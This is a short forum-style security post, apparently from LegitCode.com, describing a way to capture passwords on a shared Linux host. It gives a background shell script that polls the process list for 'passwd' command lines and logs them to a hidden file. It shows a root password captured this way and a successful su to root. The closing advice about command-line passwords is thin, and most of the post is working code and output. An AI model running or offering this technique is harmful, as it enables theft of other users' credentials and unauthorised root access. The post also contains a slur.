By: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

This is not a exploit. This is simply a Security flaw in my opinion with passwd and the process list.

[pranq@base ~]$ cat test.sh
#!/bin/sh
while [ true ]; do
sleep 1
ps auxw |grep passwd >> .pass
done
[pranq@base ~]$
[pranq@base ~]$ chmod 755 test.sh ; ./test.sh &

*Waits for someone to change their password*

"Of course you can hide this also, but thats not my point. I'm just showing how it works"

[pranq@base ~]$ cat .pass

root     22349  0.0  0.2   2220   856 pts/0    S+   19:46   0:00 passwd root r3b3l

root     22349  1.0  0.2   2220   856 pts/0    S+   19:46   0:00 passwd root r3b3l

root     22349  0.5  0.2   2220   856 pts/0    S+   19:46   0:00 passwd root r3b3l

root     22349  0.2  0.2   2220   856 pts/0    S+   19:46   0:00 passwd root r3b3l

[pranq@base ~]$ su
Password:
[root@base ~]# exit
exit
[pranq@base ~]$

So keep this in mind when your setting your passwords. I think its retarded how they ps source doesnt have a wrapper to keep passwd out of the process list to anyone except root.. I'm shure they're are reasons. Who knows.

Provided by LegitCode.com it may be published only with author details included!